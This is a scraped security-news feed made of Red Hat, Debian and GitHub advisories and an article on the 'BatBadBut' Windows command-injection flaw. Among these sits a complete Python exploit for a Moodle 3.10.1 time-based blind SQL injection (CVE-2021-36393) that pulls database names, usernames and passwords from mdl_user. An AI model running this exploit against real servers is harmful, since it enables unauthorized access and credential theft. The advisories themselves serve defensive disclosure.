Red Hat Security Advisory 2024-1812-03 - Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates. Issues addressed include denial of service and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1812.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Custom Metrics Autoscaler Operator for Red Hat OpenShift 2.12.1-376 Bug Fixes  
Advisory ID:        RHSA-2024:1812-03  
Product:            OpenShift Custom Metrics Autoscaler  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1812  
Issue date:         2024-04-15  
Revision:           03  
CVE Names:          CVE-2023-39326  
====================================================================

Summary: 

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security  
updates.

The following updates for the Custom Metric Autoscaler operator for Red Hat OpenShift are now available:

* custom-metrics-autoscaler-adapter-container  
* custom-metrics-autoscaler-admission-webhooks-container  
* custom-metrics-autoscaler-container  
* custom-metrics-autoscaler-operator-bundle-container  
* custom-metrics-autoscaler-operator-container

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Custom Metrics Autoscaler Operator for Red Hat OpenShift is an optional operator, based on the Kubernetes Event Driven Autoscaler (KEDA), which allows workloads to be scaled using additional metrics sources other than pod metrics. This release builds upon updated compiler, runtime library, and base images for the purpose of resolving any potential security issues present in previous toolset versions.

This version makes use of newer tools and libraries to address the following issues:  
golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)  
jose-go: improper handling of highly compressed data (CVE-2024-28180)  
opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

In addition, the following bug has been fixed:  
Custom metrics operator memory leak when invalid scaledObject is defined (prometheus scaler)

This release is based upon KEDA 2.12.1

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39326

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/cve/CVE-2024-28180  
https://access.redhat.com/security/cve/CVE-2023-47108  
https://access.redhat.com/security/cve/CVE-2023-39326  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2253330  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://issues.redhat.com/browse/OCPBUGS-25806  
https://issues.redhat.com/browse/OCPBUGS-30145

Red Hat Security Advisory 2024-1812-03

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

Red Hat Security Advisory 2024-1804-03 - An update for unbound is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1804.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1804-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1804Issue date:         2024-04-15Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917https://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1804-03

Red Hat Security Advisory 2024-1803-03 - Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1803.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind and bind-dyndb-ldap security updates  
Advisory ID:        RHSA-2024:1803-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1803  
Issue date:         2024-04-15  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Bind-dyndb-ldap provides an LDAP back-end plug-in for BIND. It features support for dynamic updates and internal caching, to lift the load off of your LDAP server.

Security Fix(es):

* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when \"nxdomain-redirect\" is enabled (CVE-2023-5517)

* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1803-03

Red Hat Security Advisory 2024-1802-03 - An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1802.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1802-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1802Issue date:         2024-04-15Revision:           03CVE Names:          CVE-2024-1488====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1488References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1802-03

Red Hat Security Advisory 2024-1801-03 - An update for unbound is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1801.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1801-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1801Issue date:         2024-04-15Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917https://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1801-03

Red Hat Security Advisory 2024-1800-03 - Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1800.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind and bind-dyndb-ldap security updates  
Advisory ID:        RHSA-2024:1800-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1800  
Issue date:         2024-04-15  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Bind-dyndb-ldap provides an LDAP back-end plug-in for BIND. It features support for dynamic updates and internal caching, to lift the load off of your LDAP server.

Security Fix(es):

* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when \"nxdomain-redirect\" is enabled (CVE-2023-5517)

* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1800-03

By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

### Impact
Prior to the patched version, logged in users of Mautic are vulnerable to Relative Path Traversal/Arbitrary File Deletion.  Regardless of the level of access the Mautic user had, they could delete files other than those in the media folders such as system files, libraries or other important files.

This vulnerability exists in the implementation of the GrapesJS builder in Mautic.

### Patches
Update to 4.4.12 or 5.0.4.

### Workarounds
No

### References
- https://cwe.mitre.org/data/definitions/23.html
- https://cwe.mitre.org/data/definitions/22.html
- https://attack.mitre.org/techniques/T1630/002/

### For more information

If you have any questions or comments about this advisory:

Email us at [security@mautic.org](mailto:security@mautic.org)

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2021-27916

**Mautic vulnerable to Relative Path Traversal / Arbitrary File Deletion due to GrapesJS builder**

High severity GitHub Reviewed Published Apr 11, 2024 in mautic/mautic • Updated Apr 12, 2024

**Package**

**Affected versions**

\>= 3.3.0, < 4.4.12

\>= 5.0.0-alpha, < 5.0.4

**Patched versions**

4.4.12

5.0.4

**Description**

Published to the GitHub Advisory Database

Apr 12, 2024

Last updated

Apr 12, 2024

GHSA-9fcx-cv56-w58p: Mautic vulnerable to Relative Path Traversal / Arbitrary File Deletion due to GrapesJS builder

Debian Linux Security Advisory 5656-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5656-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 11, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3157 CVE-2024-3515 CVE-2024-3516Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.122-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYYJcAACgkQZF0CR8NudjdhkRAAw6sMjh+3xY72+Q5DbvExle0J+9jEL9OALHhrVvWzGpUQjOx4sw64m03ZOV6G9W7/j5EqzMeSKrVFdRi+e/mANlBrXs4QfH1O+5cMD9fYUO/d6nPbFQJXwYOeU4GINkJOv690CQcIVAei1Udp6dmwL8pe4BAVTnDqWWgyxhBubBPM+RLVBu6/gKFa6Fm8fyOjcuwrwsdCVFNd2T9hICnQNLbh3DOFJ+6ElFCYDvcNbfdfYOXh/NIs3x8eImguEPsm8u4VmDAyg6JUZunUSiXFeVFqwmbiBDaloXjLsTRu2uBjeQcdMrU/FoZoKataksl5MZJmfsRspCIina4WOWkeL1tcg3texfCFVQ/XWreJKvFoyGOdBXcAVEcY+ePDmkahmQu3QyOB/QD4bxq76T2bwWylpB95S8f31Dr1SiJ3ru7NjKQsezxls3Ey1IWBia/qG4rYtmjwi/zcyTeejROSTXLBeCvOKFe7jPCw6iQ5fZb9eWtiBbJ2mIJBhSyrSzCKbfQjSRpV2JHPp5A7IksBcq8gtoL3L3ubhnaFsTvvtPeTQQK3pJvN+sZgnx/QMVSl2Kh/6HF28JqOPqGZWtSE+fcoQM0zubO41/LGOowNzvFK3rIa+iolu+iSykup40Xmr3sh+q8HSDKweX3znVFj+JFd9pk6DiTBwcKDjipTKlA==Cqgo-----END PGP SIGNATURE-----

Tag

#js